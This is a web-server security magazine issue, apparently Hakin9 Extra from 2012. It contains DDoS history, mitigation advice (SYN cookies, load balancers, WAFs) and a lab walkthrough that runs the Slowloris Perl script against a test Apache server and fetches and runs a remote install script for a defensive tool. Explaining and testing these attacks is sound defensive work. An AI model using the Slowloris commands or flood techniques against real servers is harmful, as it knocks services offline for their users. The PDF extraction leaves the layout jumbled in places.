Anda di halaman 1dari 49

Atola Insight

Thats all you need for data recovery.


Atola Technology offers Atola Insight the only data recovery device that covers the entire data recovery process: in-depth HDD diagnostics, firmware recovery, HDD duplication, and file recovery. It is like a whole data recovery Lab in one Tool. This product is the best choice for seasoned professionals as well as start-up data recovery companies.

Case management Real time current monitor Firmware area backup system Serial port and power control Write protection switch

If our FREE antivirus for home outperforms competitors' end-point products, imagine what our business solutions can do for you.

e most popular antivirus in the world. www.avast.com/best-antivirus

Managing: Micha Winiewski m.wisniewski@software.com.pl Senior Consultant/Publisher: Pawe Marciniak Editor in Chief: Grzegorz Tabaka grzegorz.tabaka@hakin9.org Art Director: Marcin Zikowski DTP: Marcin Zikowski www.gdstudio.pl Production Director: Andrzej Kuca andrzej.kuca@hakin9.org Marketing Director: Grzegorz Tabaka grzegorz.tabaka@hakin9.org Proofreadres: Dan Dieterle, Michael Munt, Micha Winiewski Top Betatesters: Ruggero Rissone, David von Vistauxx, Dan Dieterle, Johnette Moody, Nick Baronian, Dan Walsh, Sanjay Bhalerao, Jonathan Ringler, Arnoud Tijssen, Patrik Gange Publisher: Hakin9 Media Sp. z o.o. SK 02-682 Warszawa, ul. Bokserska 1 www.hakin9.org/en Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them. To create graphs and diagrams we used program by Mathematical formulas created by Design Science MathType DISCLAIMER! The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

Dear hakin9 Extra followers,


this months issue of hakin9 Extra is totally devoted to webserver security. Recently, it has re-surfaced as one of the hottest topics on the IT-Security market. In this issue we covered both: the most obvious, and not-so-obvious topics that fall within the scope of webserver security. In this issue you can read about: Web Application Firewalls, DDoS attack mitigation techniques, webserver SED filtering, sockets and TCPIP. I genuinely hope that you will be satisfied with the content and the quality of the articles presented. Next month, we are preparing an issue totally devoted to Snort. I hope that you will enjoy that one as well.

Micha Wisniewski, hakin9 Extra m.wisniewski@software.com.pl

Get trained today through our exclusive 7-months hands-on course. Gain access to our complex LAB environment exploiting vulnerabilities across many platforms. Receive a trainer dedicated to you during the 7 months. 10 different hands-on engagements, 2 different certifications levels.

MONTH 1

Vulnerability Assessment - level 1 Vulnerability Assessment - level 2 Vulnerability Assessment - level 3 Network Penetration Testing - level 1 Network Penetration Testing - level 2

MONTH 2

MONTH 3

Network Penetration Testing - level 3

MONTH 4

Web Application Penetration Testing - level 1 Web Application Penetration Testing - level 2

MONTH 5

Web Application Penetration Testing - level 3

MONTH 6

Certification Exam 1 - Certified Cyber 51 Pentesting Professional - (CC51PP)

MONTH 7

Certification Exam 2 - Certified Cyber 51 Pentesting Expert - (CC51PE)

Hakin9 EXTRA

8. DDoS Attack and Mitigation Techniques


By Valerio Sorrentino Nowadays the most common reason that criminals attack internet services is still to extort money, ensuring that targeted systems will no longer be attacked. DDoS Attacks are costing the average enterprise company about five million euro for a 24-hour outage and attacks can be performed from anywhere in the world with total anonymity, using software such as ToR. This software was created to defend citizens from network surveillance that threatens personal freedom and privacy. However, criminals can also use it to hide their physical location, bouncing a network signal around a number of computers.

14. Understanding and Mitigating Distributed Denial of Service Attacks


By Hari Kosaraju The mechanism in which a TCP connection is established is called a Three Way Handshake. During this process, the client will first send the server a TCP SYN packet. In response, the server will send a SYN ACK packet to the client. When the client receives this SYN ACK packet, it will send an ACK packet to the server. At this point, the TCP Connection is considered established between the client and the server. In a Denial of Service attack, there are two ways that an attacker can interrupt this process. They can send a TCP SYN packet to the server with a spoofed source IP address so that the server never receives an ACK because the spoofed source IP doesnt know anything about establishing this TCP connection and will not send the TCP ACK to this server. The other way to do this is by using a legitimate source IP but not sending a TCP ACK packet. By doing this trick repeatedly, the attacker confuses the server into maintaining numerous half open connections and exhausting the connection queue. Once this connection queue is exhausted, no new legitimate clients will be able to connect to the server [4].

20. Web Application Firewall From Planning to Deployment


By Yen Hoe Lee and Fernando Perez The WAF tuning process requires the WAF to be set to monitoring mode. In this mode, all web request traffic for the application is allowed through the web application firewall without blocking the traffic. The WAF is set to capture and report these violations. The WAF implementation team needs to review these violations, and choose to accept these violations as legitimate traffic, or choose to tweak the rules so that there will not be violations. This process is repeated until all violations are addressed. When a positive model is used, the tuning effort will always be higher. The complexity of the application will impact the level of effort needed also. In this case, the complexity is determined by the number of input, the type of input expected, and how dynamic the application pages are generated.

26. Web Server SED Filtering


By Colin Renouf One important thing to note, however, is that C represents strings as character arrays, usually with 8 bit ASCII characters, terminated with a NULL character. Java uses Unicode and under the covers stores the length of the String. The machine may represent the individual bytes in one ordering and the network in another, i.e. Big ended or little endian. These different representations can be used by the clever hacker to produce an attack that makes use of the data representation conversions that take place on the boundaries to bypass security in one layer by relying on the conversion going on behind it to create an attack string. We will cover this in another article; but the thing to understand is that each layer must have its own defences and not rely entirely on what sits in front of it. Many attacks often come from within the external firewalls, e.g. from staff, so even in a simple case where the same technologies are used throughout and no conversion occurs defences are still needed in each layer.

Hakin9 EXTRA
32. Web Application Firewalls, how tough are they now?
By Manfred Fereira If the reader is running for the first time the Siege application, must run siege.config to be able generates the configuration file. If the reader wants to test a partial page or a group of pages, one of the parameters to past is the URLs, for this tests we will provide just two URLs. But for better performance and analyses the principals URLs should be included. The more URLs in the list, the better notion of the actions taken from the WAF and LoadBalancer will the reader have. Edit the file /etc/urls.txt with vi command, and input the most URLs that the reader can, always associated with the Web site that you want to test. Commands executed in Backtrack distribution, over command line: # vi /etc/urls.txt

36. Sockets and TCPIP Core of an Attack


By Colin Renouf With the sockets API from a client perspective, a socket is declared as a particular type, is opened or more accurately connected using a connect call, then is written to or read from, and finally is closed; all much like reading or writing to a file. From the server perspective the server will bind the socket to a port, will listen to that port for requests, and when each request comes in it will accept the request. Where only a single packet is to be handled simpler sendto and recvfrom calls are available. The API suite all contains functions to look up hosts by name, and convert between the host byte representation and the network representation. All of these are documented heavily elsewhere and are generally well understood.

40. Web server Log Analysis - Detecting Bad Stuff Hitting Your Web Server
By Kim Halavakoski Web Servers on the Internet are under constant attack. Defending your web server requires vigilant response times and in-depth log analysis to be able to detect, remediate and track ongoing attacks. WAFs are today a common tool in defending high-profile websites. One often forgotten aspect of any technology is the log analysis. Products and technologies are often installed as a countermeasure to observed attacks, but the real valuable part is usually forgotten: Log analysis. Without properly analysing the logs defending against the ever changing threat landscape and evolving attack methods can be challenging. This article will show some basic methods, tools and products for analysing the logs and detecting the bad stuff targeting your website.

46. Special Edition for Forensic Professionals: The Most Advanced


and Effective New Tools from Atola Technology
By ATOLA Team The Atola Forensic Imager is a high-quality professional tool designed that meets all expectations in advanced forensic operations. Its an all-in-one solution that easily works with damaged or unstable hard disk drives. It combines a fast imager with strong data recovery capabilities for creating accurate forensic images. The powerful Atola Imaging Software is bundled with the Atola DiskSense Ethernet Unit, which utilizes the most efficient interface connections. This professional tool has been developed with the ability to Customize every step. Key parameters can be adjusted during the Imaging process to make it more effective and successful for each specific case. The Quick and accurate erasing of hard drives works at maximum speed using any specified HEX pattern to overwrite the sectors. It can also execute the Security Erase function and perform Zero-Fill, NIST 800-88 and DoD 5220.22-M compliant wiping. The Case Management System works automatically recording all important data such as date, time and hash values in one place. Archives of all past cases are stored on the host PC. The Automatic password removal function removes any user and level ATA password from a locked hard drive and displays the password to the technician.

Hakin9 EXTRA

DDoS AttAck AND MitigAtioN tecHNiqueS


VAleRio SoRReNtiNo

This overview of DDoS threat scenarios will give you the tools needed to comprehend and help you to independently use this technology in order to avoid falling victim to these attacks. This easy-to-follow practical approach is given from a professional standpoint and is intended to be utilized by all levels of students, researchers, security professionals, engineering teams, as well as entities involved in Incident and IT Resource Management.

nce you read this article you will be able to understand the following concepts and technologies:

History of denial of service attacks during the last decades. Reasons behind attacks such as ransom, hactivism and business impacts. Definitions and differences between various types of denial-of-service attacks. Prevention, detection and mitigation of denial-of-service attacks. How to test your infrastructure and configure Anti-DoS programs and tools.

Body
History Denial-of-service attacks have been around for decades, but what was the first DOS Attack? The incident took place at CERL, the Computer-based Education Research Laboratory at the University of Illinois. At the age of thirteen David Dennis executed the -ext- TUTOR command on the PLATO system in order to put all the terminals offline. It worked and he never got caught. However, during the years, single-source DoS attacks turned out to be less effective as more and more people became increasingly aware of them. This led to attacks from multiple sources, which have been aptly named, Distributed Denial of Service (DDoS) attacks. The first well-documented DDoS attack seems to have taken place against the University of Minnesota in August 1999 by Trinoo a DDoS tool. It was deployed in at least 227 systems, of which at least 114 were on the Internet, in order to flood a single computer. It was unavailable for over 48 hours.

In the beginning, the attacker-source addresses were not spoofed and the IT team could contact those launching the attacks in order to disinfect their systems. It did not take long for the attackers to change the tool code so that they could spoof different IP addresses. These days, DDoS and DoS have both become more sophisticated as shown in the following examples. The first well-publicized DDoS attacks in the public press was in February 2000. On February 7th, Yahoo! was the victim of a DDoS attack, during which the internet portal was inaccessible for three hours. On February 8th, CNN, eBay, Amazon and Buy.com were all hit by DDoS attacks that caused them to either stop functioning completely or slowed them down considerably. On February 9th, ZDNet and E*Trade experienced DDoS attacks as well. Analysts have estimated that during the period that Yahoo was down, it withstood a loss of e-commerce and advertising revenue that amounted to about 400,000. Amazon.com considers its loss to amount to around 500,000 subsequent to its widely publicized attack, which brought its web servers down for more than ten hours. IT experts estimate that with a company earning 6.5 billion euro monthly in online trades, any downtime would produce an enormous financial impact derived also from loss of reputation. 2002 DNS Root Server Attacks The largest DDoS attack ever was also the most significant DDoS attack to date, due to the fact that it threatened the very existence of the Internet itself. The thirteen Root DNS servers, which propagate changes to all the other servers, came under attack on October 21st, 2002. It is considered by many to have been an attack on the Internet itself since it hit it at its most vulnerable point. The attack lasted beyond an hour and was well coordinated with

9/2012 (16)

DDoS Attack and Mitigation Techniques

all thirteen DNS servers, which came under fire at the same time. The amount of data that was thrown at the servers in total was over 900 Megabits/second and comprised various types of protocols including TCP and UDP. The fallout of the attack was substantial. Although the servers did not crumble under the load, there were so many attack queries that some genuine queries from around the world timed out due to being unreachable. In many ways, the experience was a victory for the DNS servers since they were massively over provisioned; they were able to successfully cope with the high volume of traffic thrown at them. It validated the principle of over provisioning in order to account for further future attacks. 2007 - DNS Attacks On February 6th, 2007, six of the thirteen DNS servers were once again attacked in an attempt to bring the Internet down. The first wave of the attack lasted 2.5 hours. After a gap of three hours, the servers were hit once more for another three hours. Nevertheless, this time, engineers who worked on the systems protecting the DNS servers had learned critical lessons from the first attack in 2002. Anycast, a new technology, had been developed. It allowed the DNS servers to mitigate the effects of this type of attack. Unfortunately, two of the servers lacked the technology that had been installed and, in turn, were taken down by the attacks. Essentially, the 2007 attacks were a positive experience. The engineering teams had demonstrated that they had had the ability to withstand a coordinated DDoS attack. The attacks were believed to have arrived from the Asian-Pacific region. However, they were most likely carried out by zombie computers used by unsuspecting users and therefore, could have come from anywhere. It was discovered that end-users could help to prevent their systems from being hijacked by changing the default passwords on their home routers. We all have numerous family members that continue to use their default passwords even after we have informed them of the dangers in doing so. For obvious reason, the adoption of this recommendation is still quite low worldwide. The year 2010 marks the point when distributed denial-ofservice (DDoS) attacks broke through the 100Gbps traffic barrier. DDoS became a by-word for any politically-motivated attack that year. Arbor Networks sixth annual worldwide infrastructure security report announced that the attacks became mainstream, while numerous high-profile attacks were launched against popular internet services as well as other well-known targets. According to Arbor Networks, 5% of the worlds leading data centres deal with over 500 DDoS attacks every month. Currently, cloud services are particularly targeted. An analysis conducted by Alcatel-Lucent has shown that cloud security is what needs improving most. Aim of the attack Nowadays the most common reason that criminals attack internet services is still to extort money, ensuring that targeted systems will no longer be attacked. DDoS Attacks are costing the average enterprise company about five million euro for a 24-hour outage and attacks can be performed from anywhere in the world with total anonymity, using software such as ToR. This software was created to defend citizens from network surveillance that threatens personal freedom and privacy. However, criminals can also use it to hide their physical location, bouncing

a network signal around a number of computers. The Russian Business Network (RBN), extorted potential clients into using of their specialized hosting services by the use of a DDoS attack as well as controlling botnets such as Storm. Apart from the obvious example of an RBN hired gun, the distributed-denial-of-service attack on Estonia in May 2007, virtually shut the nation down. Furthermore, these criminal organizations exercise denialof-service attacks in order to divert the attention of the IT team so that they are forced to deal with the attack at hand. This is the perfect moment for the criminal to launch a real attack towards company or government entities. Hacktivism Hacktivism can refer to politically constructive forms of civil disobedience. It could pertain to various types of protests, whether they be anti-capitalist or political. It has been suggested by the critics that DoS attacks are an attack on our free speech, have unintentional results, waste resources and could possibly take us to a DoS war that will be won by no one. An example is the DDoS attack against the FBI. The FBI site was down for a brief period of time after only seven minutes of attack. This attack was feasible due to the amount of people that participated in attacking internet censorship. Anonymous or anon is one of the worlds most well-known hacktivist collectives, especially after launching DDoS attacks on the American, Russian, Mexican and Polish, governments. As demonstrated in ramp file extract posted by anonymous in February 2012 on Pastebin, the battle is fought at various levels by Anonymous, in fact, it is not made merely of trivial DDoS attacks, but also by making the government conscious of their own mistakes and waking up the citizens when laws infringe on their privacy and civil liberties: To protest SOPA, Wallstreet, our irresponsible leaders and the beloved bankers who are starving the world for their own selfish needs out of sheer sadistic fun, On March 31, anonymous will shut the Internet down. Who sacrifices freedom for security deserves neither. Benjamin Franklin We know you wont listen. We know you wont change. We know its because you dont want to. We know its because you like it how it is. You bullied us into your delusion. We have seen you brutalize harmless old woman who were protesting for peace. We do not forget because we know you will only use that to start again. We know your true face. We know you will never stop. Neither are we. We know. We are Anonymous. We are Legion. We do not Forgive. We do not Forget. You know who you are, Expect us. The increase of groups like Anonymous and LuzSec, as well as continuous cyber-wars, has finally revealed the issues of cybersecurity. The risk is authentic and it is progressively shifting into political and military action. cyber-war A cyber-war is a new way for military groups and terrorists to perpetrate war via internet. In this way, war no longer has to involve physical weapons, since it could be performed from computers located anywhere in the world. A cyber-war DDoS attack is able to stop critical infrastructures of the targeted country such as banks, hospitals, media and transportation systems.

www.hakin9.org/en

Hakin9 EXTRA
For example, US websites were under a DDoS attack from a botnet consisting of about 20,000 nodes, based on a MyDoom worm. The agents were launching a mix of ICMP ECHO, UDP packets, HTTP GET requests. Definitions In a nutshell, DoS and DDoS attacks are executed by sending several crafted requests to targeted systems, consuming their resources such as processing cycles, memory resources, network bandwidth and preventing them from providing the intended service or communication to the legitimate users. Perpetrators of these attacks usually target sites or services hosted on web servers, credit-card-payment gateways, e-mail and root DNS servers. What is the difference between DoS and DDoS attacks? DoS: Denial-of-Service attacks are defined as resourceexhaustion flooding attacks and logic attacks from one source. This also makes the geolocation of the attacker easy to trace and for that reason relatively easy to prevent. The attacks based on resource-exhaustion flooding determine the servers or networks resources to be consumed to the point where the service no longer responds or is reduced. Logic attacks take advantage of security vulnerabilities in order to crash a server or to drastically reduce its performance. DDoS: Distributed-Denial-of-Service attacks originate from more than one source and multiple locations at the same time. The tools used for denial-of-service attacks tend to create different types of malicious or legitimate traffic that, when clustered together with hundreds and thousands of other computers, create a massive attack, thus, overwhelming the target server. The term distributed stems from a battery system of zombies - which in many cases is infected with malware - that is often used in order to make the aggression effective. on their computer such as a virus. This is the case of systems that without their owners cognizance, have become part of a botnet and that attackers can use to issue commands in order to trigger a DDoS attack toward a website. Since the malicious packets come from several IP addresses, DoS defenses based on monitoring the volume of packets coming from a single address or network would fail, due to the fact that the attacks could come from all over world. For example, instead of receiving a thousand gigantic pings per second from a single attacking node, the victim could receive one ping per second from thousands of attacking sources. typology The following are some examples of denial of service attacks: Ping-Flood Attacks A Ping-Flood attack is the most rudimentary of all attacks and is actually considered a brute-force attack that utilizes ICMP Echo Request also known as ping packets. These require the target to have a smaller bandwidth than the source but may also be launched from a single source. A sufficient number of machines are compromised, and then turned into Zombies. They are subsequently used to ping the victim, who is unable to operate when the sum of all the attack bandwidths are greater than that of the victim. Blocking becomes improbable when the ping source addresses are spoofed, since one does not know the infected machine that is attacking. In contrast, the attacker brings down the targets total network, which might be an undesired result. Significant resources are necessary to mount this kind of attack. This could be challenging to assemble. However, if the target is working with their ISP, the attack can be blocked. SYN-Flood Attacks SYN-Floods were developed from the Ping-Flood. After all, they say necessity is the mother of invention. In a SYN-Flood attack, the attacker takes advantage of the protocol by sending the server many SYN packets. Since the server must handle every packet as if it were a connection request, it responds with a SYN-ACK. The attacker could choose not to respond to the SYN-ACK and, in turn, the server will have a half-open connection. Nonetheless, the server could block subsequent packets from the attackers IP address and therefore, end the attack prematurely.

Figure 1. DDoS Attack Schema

Figure 2. SYN Flood UML Diagram

The users are typically unaware that their computer has been compromised by malicious code, after they have accessed an infected web site or have inadvertently run malware programs

Another option is for the attacker to spoof the clients IP address. The server will then respond to the IP address, but since a connection has not been initiated, this client would then drop the

10

9/2012 (16)

DDoS Attack and Mitigation Techniques

SYN-ACK. The server would then be left to wait for a response while using up resources on the server with these half-open connections. No new connections can be made after all the resources are consumed, regardless of their legitimacy. The result is a successful attack. the Slow loris Attack A Slow Loris attack holds the connection open at layer 7 by sending incomplete HTTP requests to the web server. The connection is opened by the server and it will wait to receive a complete header. It will receive only false header lines keeping the connection allocated.

monitoring tools continue to work during the attack. Monitoring Network traffic In order to understand normal network traffic patterns, companies should regularly collect sample packets as well as other pertinent information from switches, routers and other devices in order to establish a baseline for normal traffic. It is required to know what sort of traffic comes in, monitoring it over a period of six months. This information should be incorporated into a correlation engine in order to detect threats, alerts and reporting, that can be used to avoid future attacks. Network Firewall Firewalls use some mechanisms in order to defend servers from DoS attacks such as black-listing IP-addresses and other applications. While Network firewalls can halt classic DOS attacks like a Ping of Death or Land, it is virtually impossible for a common network firewall to be able to distinguish it, in order to stop advanced DDoS. In addition, network security devices using state-full inspection technology could be quite vulnerable to DDOS attacks. Attackers know that these security applications are exposed, so they attack them overloading the TCP Stack in order to stop them. Nonetheless, network firewalls can obtain evidence of attacks such as source and destination IP addresses, protocol and packet length. This information is important for the ISP in order to filter out the abnormal traffic. load Balancers It is conventional wisdom that if your infrastructure is behind a hardware load balancer, then you are not vulnerable to DoS/ DDos. In fact, a DoS attack could pass through load balancers if they are not properly configured. Delayed binding features also known as TCP Splicing must be activated in order to protect the infrastructure against a DoS attack. Delayed binding permits the load balancer to perform an HTTP request header completeness check, ensuring that your web server will never receive incomplete requests. Delayed binding is a very effective way to protect against a Slow Loris attack. SYN cookies SYN Cookies has proved to be one method of protecting against SYN-Flood attacks by eliminating the use of half-open connection resources used by the server. Instead of storing the information locally, the new connection information is embedded in the TCP sequence number. It then passes it back to the client in the SYN-ACK packet. Once the server receives the ACK client response, it reconstructs the entry for the SYN queue after the ACK holds the sequence number incremented by one. In this way, the attack is unable to dominate all of the resources and is therefore reduced to the level of a Ping-Flood attack. Web Application Firewalls Avoiding both layer 4 and layer 7 DoS attacks, WAF servers continue to provide services to applications without a degradation in performance. WAFs automatically understand application structure such as application URLs, methods, parameters and cookies in order to precisely detect attack patterns. This information is used to create a traffic baseline also known as a white list of acceptable user behavior. live tests Note that I have no liability resulting from use of the programs mentioned below. DoS and DDoS attacks constitute law viola-

Figure 3. Slow Loris Attack

Ex: POST /somepage.com HTTP/1.1\r\n Host: some_url_or_ other.com\r\n User-Agent: Mozilla/4.0 \r\n Content-Length: 42\r\n X-a: b\r\n Notice that everything up to the final line is legitimate. Instead of finishing with an additional \r\n, if should finish with X-a: b\r\n\r\n. Many web servers wait five minutes, by default, resulting in using up one resource for up to five minutes. In many cases, it will take very little time for an attacker to use up the remaining resources for new connections. In order to keep each resource busy, a new header with the missing CRLF will be sent again. By varying this, writing Intrusion Detection signatures are difficult without stopping legitimate traffic. Therefore, with a single packet, an attacker can keep a connection busy for up to five minutes. Detection, prevention and mitigation methods: Scalability and Overprovisioning Monitoring Network Traffic Network Firewall SYN Cookies Load Balancers Web Application Firewall

Scalability and overprovisioning Protecting a server against denial-of-service attacks, DoS/ DDoS, is an arduous endeavor. Using a server with many resources such as CPU and memory, is perhaps the simplest way as well as building the server application to scale up well. If feasible, it is recommended to use a distributed model to maintain redundancy for critical services and applications. It is very important to provide scalability of monitoring tools, assuring that

www.hakin9.org/en

11

Hakin9 EXTRA
tions around the globe. Furthermore it is recommended to use a virtual machine with no access to internet or any internal lan in order to avoid any problems. Step 1: Setup a web server In order to install Apache web server in Linux first of all log on to your Linux machine. Then open a terminal and enter this command:
sudo apt-get install tasksel

dow open to the site, press F5 or the refresh button on the browser. Are you able to connect? After just 30 seconds the following appeared when I was requesting the server page:

Figure 7. Web Server output after DoS attack

Figure 4. tasksel installation output

Once completed the installation type from terminal: Sudo tasksel

SteP 3. Stop Slowloris attack In order to block the Slowloris attack you could install DoSDeflate. In order to install the program you should enter the following command:
wget http://www.inetbase.com/scripts/ddos/install.sh

To download the program installation script and after you will change the permission of the file in order to execute it
chmod 0700 install.sh

Finally you can lunch the installation hit this command:


Figure 5. tasksel software selection output
./install.sh

Note that during the installation you will be asked to enter the password for the Mysql, (default username is root). To confirm that your web server is working, open a browser on the same machine and type in it localhost otherwise from another machine enter the Linux machines internal IP address into the URL bar. A default usable web page should appear. Thats All Folks! In Ubuntu with just one click you can install LAMP , if your linux machine use a different package manager than use your package managers syntax to install it. Note that Apache is called httpd in Red Hat and some other repositories. Step 2: Attack web server via the Slowloris attack Initially you need to download the Slowloris script from pastebin or sourceforge. After download the script enter this command to start it:
perl slowloris.pl -dns <WebServerIPaddress>

If it doesnt workout, it is simple to uninstall too. To uninstall enter this command:


wget http://www.inetbase.com/scripts/ddos/uninstall.ddos

Note that this script require a the Perl interpreter with the modules IO::Socket::INET, IO::Socket::SSL, and GetOpt::Long. In case that you dont have already installed these modules. You can install modules using CPAN and enter the following commands:
perl -MCPAN -e install IO::Socket::INET perl -MCPAN -e install IO::Socket::SSL

After you will change the permission of the file in order to execute it:
chmod 0700 uninstall.ddos

Then you can lunch the unistall program entering this command:
./uninstall.ddos

In a browser window, attempt to connect to the Apache web server hosted on the Linux machine. If you already have a win-

I have found that these mitigation techniques will stop 90% of the attacks that currently exist. Naturally firewalls rules and / or ACL rules configured at the router or switch level also help.

12

9/2012 (16)

DDoS Attack and Mitigation Techniques

Attacks are increasing in their sophistication and moving up the OSI Model from brute-force attacks at the network layer to more refined attacks at the application layer; the most elementary being from the cutting cable attack at physical layer, moving through attacks such as Ping and SYN-Flood attacks at the network and transport layer and continuing up to the application layer, thus providing the attackers various options. At the same time, there is an increase of botnets as well as sophisticated command and control (C&C). Launching brute-force attacks like SYN-Flood or reflected attacks is simply the easier option because they work against the majority of targets. Attacks are becoming progressively common such as the attacks on Facebook and Twitter. In fact, this quarter, as reported by Prolexic, DDoS attacks were evenly spread across all vertical industries including financial services, e-Commerce, SaaS, payment processing, travel/hospitality, and gaming. As in previous attack reports, China (33%) is the top source country for distributed denial-ofservice attack traffic. Moreover, this quarter it is joined at the top of the list by Thailand (23%) and the United States (8%), although the United States, UK and Hong Kong consider denial-of-service attacks as the biggest security risk of them all. I believe that it is necessary to perform analysis of attack patterns in order to rapidly identify upcoming attacks as well as share lessons learned between different incident response teams. Therefore, it is extremely important to subscript to third-party intelligence service providers and with some participation in industry security groups or forums (e.g. CERT). Nevertheless, in order to discriminate suspicious traffic from legitimate ones and dealing with botnets, security profes-

conclusion

sionals must have hands-on expertise; Manage and defend against DDoS attacks as well as infiltrate and stop DDoS command-and-control servers. Unless companies learn how to read that data and take appropriate countermeasures, even the best monitoring and reporting statistics are completely and utterly useless.

References and Resources


http://www.platohistory.org/blog/2010/02/perhaps-the-first-denial-of-service-attack.html http://www.prolexic.com/ http://deflate.medialayer.com/ http://www.rfxn.com/projects/

VAleRio SoRReNtiNo
CISM, CISA, ISO 27001 Lead Auditor, CCNA is an author, trainer and security consultant, who has been working in the IT industry for over 12 years for Defence, Space, Financial, Telecommunications and Manufacturing companies. His extensive experience includes design, development and implementation of enterprise applications, infrastructure and security solutions in order to achieve organizational business objectives. Valerio performs information security demonstrations and training for both technical and non-technical audiences. He is also a member of numerous associations in the industry such as the Cloud Computing Community, itSMF, ISACA and Clusit. This article marks his 4th collaboration with Hackin9 Magazine.

w. ww

g/en .or kin9 ha

www.hakin9.org/en

13

Hakin9 EXTRA

UnDerSTAnDing AnD MiTigATing DiSTribUTeD DeniAl of Service ATTAckS


HAri koSArAjU

One of the most common and costly cyber attacks on the Internet is the Distributed Denial of Service attack (DDoS). Enterprises across the globe are scrambling to prevent their critical systems from being taken down by amateur hackers using readily available DDoS toolkits. DDoS attacks have been accelerating lately and an adequate solution to preventing them still evades security researchers. This article will discuss the technical details of how a DDoS attack occurs and offers steps on how they can be mitigated.
Denial of Service attack is defined as when an attacker disrupts access to a server or application of the victim. They disrupt networks in many ways but typically they deny access to a particular server or application service by bombarding it with an abnormal number or format of requests. Due to the lack of authentication of IP addresses, they can be spoofed and it becomes incredibly difficult to determine the source of the attack and stop it. To make matters worse, these attacks are usually orchestrated through the use of a number of zombie machines that are part of a command and control Botnet. These machines generate the malicious traffic denial of service traffic and are not owned by the attacker but have been compromised through malware to be under the attackers control. In most cases, the owner of these machines does not even know that they have been involved in an attack. When multiple hosts are involved in a coordinated Denial of Service attack, it is referred to as a Distributed Denial of Service(DDoS) attack. DDoS attacks are an unfortunately common occurrence on the internet and are growing at an alarming rate. A report by Arbor Networks shows that distributed denial of service attacks have now surpassed the 100 Gbps of malicious traffic generation barrier [1]. What makes DDoS attacks so devastating is that it can be very simple for an attacker to set the attack up with the latest generation of toolkits. However, it is very expensive for an organization to mitigate and/or trace back the DDoS attack to its source. This asymmetry makes it one of the most pressing security issues for enterprises globally.

During most DDoS attacks, spoofed or forged IP addresses are used which makes it more challenging to trace the source of the attack. When an IP packet with a spoofed source address is responded to by a host, this causes IP backscatter. These backscattered packets will not be responded to. Researchers have looked at measuring backscatter and applying statistical analysis to determine how frequent DDoS attacks are on the internet. Their research however makes the assumption that the attacker chooses spoofed addresses randomly. This assumption is not necessarily valid because attackers dont necessarily pick IP addresses randomly and some IP packets destined for spoofed IP addresses are filtered before they ever reach their intended destination. Finally, the attacker may use a non random reflector address to amplify their attack. One particular study estimated that there were about 12805 DDoS attacks across 2000 organizations in a three week period [2]. In the first part of this article we will introduce various types of Denial of Service attacks and how they work at the protocol level. Next we will discuss what a Distributed Denial of Service attack is, and how current DDoS toolkits work. Finally, we will discuss how to mitigate DDoS attacks from an enterprise, and Internet Service Provider perspective.

Types of Denial of Service Attacks

Denial of Service attacks can be classified as those that are executed on a local machine through a shell and those that are network based. Once a user has an account on a host system, they can launch any number of Denial of Service attacks.

14

9/2012 (16)

Understanding and Mitigating Distributed Denial of Service Attacks

Remember that a Denial of Service attack is one that denies services to legitimate users. Therefore, attacks such as forking processes repeatedly until an operating systems process limit is reached, creating files repeatedly to exhaust file handles, and filling up disk space with random data are all examples of local Denial of Service attacks. Once a system has been compromised such that a malicious user has shell access, any number of local attacks are possible [3]. In contrast to local Denial of Service attacks, network based Denial of Service attacks do not require any type of user credential. In fact, many attackers will first spoof the source address of any network based attack to hide their tracks. This is possible because of the fact that IP addresses are not authenticated. The mechanism in which a TCP connection is established is called a Three Way Handshake. During this process, the client will first send the server a TCP SYN packet. In response, the server will send a SYN ACK packet to the client. When the client receives this SYN ACK packet, it will send an ACK packet to the server. At this point, the TCP Connection is considered established between the client and the server. In a Denial of Service attack, there are two ways that an attacker can interrupt this process. They can send a TCP SYN packet to the server with a spoofed source IP address so that the server never receives an ACK because the spoofed source IP doesnt know anything about establishing this TCP connection and will not send the TCP ACK to this server. The other way to do this is by using a legitimate source IP but not sending a TCP ACK packet. By doing this trick repeatedly, the attacker confuses the server into maintaining numerous half open connections and exhausting the connection queue. Once this connection queue is exhausted, no new legitimate clients will be able to connect to the server [4]. Another common Denial of Service attack is called a Smurf attack. In this particular type of attack, an ICMP echo request packet is sent to a list of IP broadcast addresses. These lists are shared between hackers for this type of attack. The ICMP echo request packet that is sent again has a spoofed source IP address. All hosts that receive the broadcast will send an ICMP echo response to the victim, thereby multiplying the effect and overwhelming the target machine with network traffic [5]. Some denial of service attacks are low volume attacks that use carefully crafted packet formats. For instance, in the Ping of Death attack, a single ICMP packet could render a host inoperable. This packet was unique in that it has a length of 65536 bytes. However, the IP protocol specifies that the largest size possible is 65535 bytes. It is possible to construct the ping of death packet by fragmenting the packet over multiple Ethernet frames and setting the last frame to have the maximum offset but provide a large amount of data in that frame. This will create an IP packet greater than 65535 bytes which is the largest allowed by RFC 791. Since TCP/IP stacks were not designed to handle IP packets larger than dictated by the RFC, this causes the system to crash. Note that this bug has subsequently been fixed on most systems [8]. Another network based Denial of Service Attack is called the Land attack. In this type of attack an attacker sends a spoofed TCP SYN packet with the source and destination IP address set to the target machine. This will cause susceptible machines to lock up [6]. All of the attacks thus far have been layer 4 and lower attacks. There are numerous application layer Denial of Service attacks that are possible:

In a mail attack, the attacker will overwhelm a target by sending its email address a lot of mail. This mail will fill up the targets inbox and likely overwhelm the targets mail server [7]. DNS flooding attacks are also a common attack. In a DNS flood, an attacker will send a DNS Request packet with a spoofed Source IP address of the target machine. This will cause the DNS server to send a response that happens to be much bigger. In some cases, a DNS request of 60 bytes can generate a 512 byte response [4 pp 48]. This large amplification is exactly what an attacker is looking to accomplish in order to overwhelm a host. HTTP flooding is when a large number of http requests are sent to a web server with the intention of denying service. This attack is popular because HTTP requests are typically not blocked on the path to the victim because they are difficult to discern from legitimate HTTP traffic. A Slowloris attack is a specific HTTP based Denial of Service attack. It is when Slowloris client keeps a connection open to an HTTP server for an extended period of time. This exhausts the connection queue of the server thereby making additional connections impossible. The client will send portions of the request slowly and thereby keep the connection open much longer than normal. Slowloris is an example of a low bandwidth denial of service attack [9].

Distributed Denial of Service Attack (DDoS)

